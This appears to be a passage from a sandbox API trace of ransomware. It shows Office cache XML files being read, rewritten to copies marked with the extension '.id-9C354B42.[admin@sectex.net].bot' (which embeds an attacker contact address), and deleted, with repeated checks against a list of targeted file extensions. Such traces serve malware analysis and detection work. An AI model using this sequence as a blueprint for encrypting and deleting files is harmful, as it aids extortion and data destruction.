	[0033.978] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.978] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.978] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0033.978] GetLastError () returned 0x0
	[0033.978] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x5ac, lpOverlapped=0x0) returned 1
	[0033.980] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x5b0, lpOverlapped=0x0) returned 1
	[0033.981] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.981] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0033.981] SetEndOfFile (hFile=0x180) returned 1
	[0033.981] CloseHandle (hObject=0x180) returned 1
	[0033.982] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.982] SetEndOfFile (hFile=0x18c) returned 1
	[0033.982] CloseHandle (hObject=0x18c) returned 1
	[0033.982] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0033.983] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml")) returned 1
	[0033.983] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77
	[0033.983] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77
	[0033.983] lstrlenW (lpString=".doc") returned 4
	[0033.983] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.983] lstrlenW (lpString=".docx") returned 5
	[0033.983] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0033.983] lstrlenW (lpString=".pdf") returned 4
	[0033.983] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.983] lstrlenW (lpString=".xls") returned 4
	[0033.983] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.983] lstrlenW (lpString=".xlsx") returned 5
	[0033.983] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0033.983] lstrlenW (lpString=".ppt") returned 4
	[0033.983] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.983] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77
	[0033.983] lstrlenW (lpString=".zip") returned 4
	[0033.983] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.983] lstrlenW (lpString=".rar") returned 4
	[0033.983] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.983] lstrlenW (lpString=".bz2") returned 4
	[0033.983] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.984] lstrlenW (lpString=".7z") returned 3
	[0033.984] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.984] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77
	[0033.984] lstrlenW (lpString=".dbf") returned 4
	[0033.984] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.984] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77
	[0033.984] lstrlenW (lpString=".1cd") returned 4
	[0033.984] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.984] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77
	[0033.984] lstrlenW (lpString=".jpg") returned 4
	[0033.984] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.984] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77
	[0033.984] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77
	[0033.984] lstrlenW (lpString=".doc") returned 4
	[0033.984] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.984] lstrlenW (lpString=".docx") returned 5
	[0033.984] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0033.984] lstrlenW (lpString=".pdf") returned 4
	[0033.984] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.984] lstrlenW (lpString=".xls") returned 4
	[0033.984] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.984] lstrlenW (lpString=".xlsx") returned 5
	[0033.984] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0033.984] lstrlenW (lpString=".ppt") returned 4
	[0033.984] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.984] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77
	[0033.984] lstrlenW (lpString=".zip") returned 4
	[0033.984] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.984] lstrlenW (lpString=".rar") returned 4
	[0033.984] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.984] lstrlenW (lpString=".bz2") returned 4
	[0033.984] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.984] lstrlenW (lpString=".7z") returned 3
	[0033.984] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77
	[0033.985] lstrlenW (lpString=".dbf") returned 4
	[0033.985] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77
	[0033.985] lstrlenW (lpString=".1cd") returned 4
	[0033.985] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77
	[0033.985] lstrlenW (lpString=".jpg") returned 4
	[0033.985] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.985] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.985] lstrlenW (lpString="Setup.xml") returned 9
	[0033.985] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.985] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1872) returned 1
	[0033.985] CloseHandle (hObject=0x18c) returned 1
	[0033.985] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020
	[0033.985] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.985] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.986] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.986] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.986] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0033.986] GetLastError () returned 0x0
	[0033.986] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x750, lpOverlapped=0x0) returned 1
	[0034.260] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x760, lpOverlapped=0x0) returned 1
	[0034.261] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0034.261] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0034.261] SetEndOfFile (hFile=0x180) returned 1
	[0034.261] CloseHandle (hObject=0x180) returned 1
	[0034.262] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.262] SetEndOfFile (hFile=0x18c) returned 1
	[0034.263] CloseHandle (hObject=0x18c) returned 1
	[0034.263] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0034.263] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1
	[0034.263] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.263] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.263] lstrlenW (lpString=".doc") returned 4
	[0034.263] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0034.263] lstrlenW (lpString=".docx") returned 5
	[0034.263] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0034.263] lstrlenW (lpString=".pdf") returned 4
	[0034.263] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0034.264] lstrlenW (lpString=".xls") returned 4
	[0034.264] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0034.264] lstrlenW (lpString=".xlsx") returned 5
	[0034.264] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0034.264] lstrlenW (lpString=".ppt") returned 4
	[0034.264] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0034.264] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.264] lstrlenW (lpString=".zip") returned 4
	[0034.264] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0034.264] lstrlenW (lpString=".rar") returned 4
	[0034.264] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0034.264] lstrlenW (lpString=".bz2") returned 4
	[0034.264] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0034.264] lstrlenW (lpString=".7z") returned 3
	[0034.264] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0034.264] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.264] lstrlenW (lpString=".dbf") returned 4
	[0034.264] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0034.264] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.264] lstrlenW (lpString=".1cd") returned 4
	[0034.264] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0034.264] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.264] lstrlenW (lpString=".jpg") returned 4
	[0034.264] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0034.265] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.265] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.265] lstrlenW (lpString=".doc") returned 4
	[0034.265] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0034.265] lstrlenW (lpString=".docx") returned 5
	[0034.265] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0034.265] lstrlenW (lpString=".pdf") returned 4
	[0034.265] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0034.265] lstrlenW (lpString=".xls") returned 4
	[0034.265] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0034.265] lstrlenW (lpString=".xlsx") returned 5
	[0034.265] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0034.265] lstrlenW (lpString=".ppt") returned 4
	[0034.265] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0034.265] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.265] lstrlenW (lpString=".zip") returned 4
	[0034.265] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0034.265] lstrlenW (lpString=".rar") returned 4
	[0034.265] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0034.265] lstrlenW (lpString=".bz2") returned 4
	[0034.265] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0034.265] lstrlenW (lpString=".7z") returned 3
	[0034.265] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0034.265] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.265] lstrlenW (lpString=".dbf") returned 4
	[0034.265] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0034.265] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.265] lstrlenW (lpString=".1cd") returned 4
	[0034.265] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0034.265] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.265] lstrlenW (lpString=".jpg") returned 4
	[0034.265] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0034.266] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0034.266] lstrlenW (lpString="OfficeMUI.xml") returned 13
	[0034.266] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0034.266] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=5557) returned 1
	[0034.266] CloseHandle (hObject=0x18c) returned 1
	[0034.266] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml")) returned 0x2020
	[0034.266] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0034.266] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0034.266] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.266] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.266] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0034.267] GetLastError () returned 0x0
	[0034.267] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x15b5, lpOverlapped=0x0) returned 1
	[0034.269] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x15c0, lpOverlapped=0x0) returned 1
	[0034.270] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0034.270] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xee, lpOverlapped=0x0) returned 1
	[0034.270] SetEndOfFile (hFile=0x180) returned 1
	[0034.270] CloseHandle (hObject=0x180) returned 1
	[0034.271] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.271] SetEndOfFile (hFile=0x18c) returned 1
	[0034.271] CloseHandle (hObject=0x18c) returned 1
	[0034.272] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0034.272] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml")) returned 1
	[0034.272] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76
	[0034.272] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76
	[0034.272] lstrlenW (lpString=".doc") returned 4
	[0034.272] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0034.272] lstrlenW (lpString=".docx") returned 5
	[0034.272] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0034.272] lstrlenW (lpString=".pdf") returned 4
	[0034.272] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0034.272] lstrlenW (lpString=".xls") returned 4
	[0034.272] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0034.272] lstrlenW (lpString=".xlsx") returned 5
	[0034.272] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0034.272] lstrlenW (lpString=".ppt") returned 4
	[0034.272] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0034.272] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76
	[0034.272] lstrlenW (lpString=".zip") returned 4
	[0034.272] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0034.272] lstrlenW (lpString=".rar") returned 4
	[0034.272] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0034.272] lstrlenW (lpString=".bz2") returned 4
	[0034.272] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0034.273] lstrlenW (lpString=".7z") returned 3
	[0034.273] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0034.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76
	[0034.273] lstrlenW (lpString=".dbf") returned 4
	[0034.273] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0034.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76
	[0034.273] lstrlenW (lpString=".1cd") returned 4
	[0034.273] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0034.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76
	[0034.273] lstrlenW (lpString=".jpg") returned 4
	[0034.273] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0034.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76
	[0034.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76
	[0034.273] lstrlenW (lpString=".doc") returned 4
	[0034.273] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0034.273] lstrlenW (lpString=".docx") returned 5
	[0034.273] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0034.273] lstrlenW (lpString=".pdf") returned 4
	[0034.273] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0034.273] lstrlenW (lpString=".xls") returned 4
	[0034.273] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0034.273] lstrlenW (lpString=".xlsx") returned 5
	[0034.273] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0034.273] lstrlenW (lpString=".ppt") returned 4
	[0034.273] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0034.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76
	[0034.273] lstrlenW (lpString=".zip") returned 4
	[0034.273] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0034.273] lstrlenW (lpString=".rar") returned 4
	[0034.273] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0034.273] lstrlenW (lpString=".bz2") returned 4
	[0034.273] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0034.273] lstrlenW (lpString=".7z") returned 3
	[0034.273] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0034.274] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76
	[0034.274] lstrlenW (lpString=".dbf") returned 4
	[0034.274] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0034.274] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76
	[0034.274] lstrlenW (lpString=".1cd") returned 4
	[0034.274] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0034.274] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76
	[0034.274] lstrlenW (lpString=".jpg") returned 4
	[0034.274] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0034.274] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0034.274] lstrlenW (lpString="OfficeMUISet.xml") returned 16
	[0034.274] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0034.274] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=819) returned 1
	[0034.274] CloseHandle (hObject=0x18c) returned 1
